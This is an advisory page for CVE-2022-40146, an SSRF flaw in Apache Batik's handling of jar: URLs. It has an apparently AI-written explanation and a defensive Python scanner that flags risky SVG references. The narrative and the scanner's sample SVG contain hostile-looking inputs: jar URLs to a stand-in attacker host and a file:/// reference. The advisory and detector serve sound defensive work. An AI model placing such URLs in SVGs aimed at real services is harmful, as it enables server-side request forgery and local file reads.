VYPR
High severity · NVD Advisory · Published Sep 22, 2022 · Updated Nov 3, 2025

Jar url should be blocked by DefaultScriptSecurity

CVE-2022-40146

Description

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Server-Side Request Forgery (SSRF) in Apache Batik via jar URL allows attackers to read local files or access internal resources.

Vulnerability

Overview

CVE-2022-40146 is a Server-Side Request Forgery (SSRF) vulnerability in Apache XML Graphics Batik version 1.14. The issue stems from Batik's handling of jar URLs within SVG files. Specifically, the DefaultScriptSecurity mechanism fails to properly block jar: protocol URLs, allowing an attacker to craft an SVG that references a malicious jar archive via a networked URL (e.g., jar:http://attacker.com/poc.jar!/) [1][3]. This omission means SVG content can trigger outbound requests to arbitrary hosts or local file system access.

Exploitation

Exploitation requires the attacker to supply a crafted SVG file to an application that uses Batik for SVG processing, such as transcoding or rendering. The attack is triggered when Batik processes an SVG containing an element whose `xlink:href` attribute points to a jar URL [3]. No authentication is needed if the application accepts user-supplied SVGs. The SSRF occurs when Batik attempts to fetch the jar archive, making requests to attacker-controlled or internal network addresses.

Impact

A successful attack can lead to reading arbitrary files on the server (via file:// scheme) or probing internal infrastructure that is not otherwise accessible. Although the primary vector is SSRF, this can escalate to information disclosure, internal network scanning, or potentially triggering other vulnerabilities in internal services.

Mitigation

Apache released a fix in Batik 1.15 (or later). Users should upgrade to Batik 1.17, which addresses multiple CVEs, including this one [4]. No workaround is available for version 1.14; upgrading is the only mitigation [4].
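Defenders who accept SVG uploads usually want a way to triage submissions that reference non-local resources, independent of the renderer. The following is an added example (not code from the advisory or from the Batik project): it walks every element of an SVG document, inspects the `href` and `xlink:href` attributes Batik resolves as external references, and reports any whose URL scheme is outside an allowlist, so `jar:` (including nested forms like `jar:http://...`), `file:` and network schemes all surface. The allowlist, the attribute list and the sample SVG (with `example.invalid` as a placeholder host) are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

XLINK_NS = "http://www.w3.org/1999/xlink"

# Attributes Batik resolves as external references: the SVG 2 plain href and
# the SVG 1.1 xlink:href. ElementTree exposes namespaced attributes as
# "{namespace}localname", so the xlink form is spelled that way here.
URL_ATTRIBUTES = ("href", "{%s}href" % XLINK_NS)

# Schemes an upload pipeline has a reason to accept. This allowlist is an
# assumption for the example; relative references (no scheme) also pass.
ALLOWED_SCHEMES = {"data"}

# RFC 3986 scheme syntax, anchored at the start after optional whitespace.
# Nested forms such as jar:http://... or jar:file:///... report "jar",
# the prefix the advisory says DefaultScriptSecurity failed to reject.
_SCHEME_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.\-]*):")


def url_scheme(value: str) -> Optional[str]:
    """Return the lower-cased URL scheme, or None for a relative reference."""
    match = _SCHEME_RE.match(value)
    return match.group(1).lower() if match else None


def _local_name(qualified: str) -> str:
    """Strip an ElementTree '{namespace}' prefix from a tag or attribute name."""
    return qualified.rsplit("}", 1)[-1]


def find_disallowed_refs(svg_text: str) -> List[Tuple[str, str, str, str]]:
    """Return one (element, attribute, scheme, value) tuple per URL-bearing
    attribute whose scheme is outside ALLOWED_SCHEMES. An empty list means
    nothing to flag. Malformed XML raises ET.ParseError; a triage pipeline
    should treat that as a rejection rather than pass the file on."""
    root = ET.fromstring(svg_text)
    findings: List[Tuple[str, str, str, str]] = []
    for element in root.iter():
        for attribute in URL_ATTRIBUTES:
            value = element.get(attribute)
            if value is None:
                continue
            scheme = url_scheme(value)
            if scheme is not None and scheme not in ALLOWED_SCHEMES:
                findings.append(
                    (_local_name(element.tag), _local_name(attribute), scheme, value.strip())
                )
    return findings


# Constructed sample: a benign data: image, a relative reference, a script
# element whose xlink:href is a jar URL of the kind the advisory describes
# (example.invalid is a placeholder host), and a file: reference.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <image width="1" height="1" xlink:href="data:image/png;base64,iVBORw0KGgo="/>
  <image width="1" height="1" xlink:href="logo.png"/>
  <script type="text/ecmascript" xlink:href="jar:http://example.invalid/poc.jar!/"/>
  <image width="1" height="1" href="file:///etc/hostname"/>
</svg>"""


if __name__ == "__main__":
    for element, attribute, scheme, value in find_disallowed_refs(SAMPLE_SVG):
        print(f"flag: <{element} {attribute}> scheme={scheme} value={value}")
```

The check only sees literal attribute values, so a reference assembled by embedded script at render time is not caught; that gap is why this complements, rather than replaces, the upgrade to the patched Batik release. Because a parse failure means the file's references could not be enumerated, treat `ET.ParseError` as a reject in the pipeline.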

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                        Ecosystem   Affected versions   Patched versions
org.apache.xmlgraphics:batik   Maven       >= 1.0, < 1.15      1.15

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References: 7

News mentions: 0 (no linked articles in our index yet)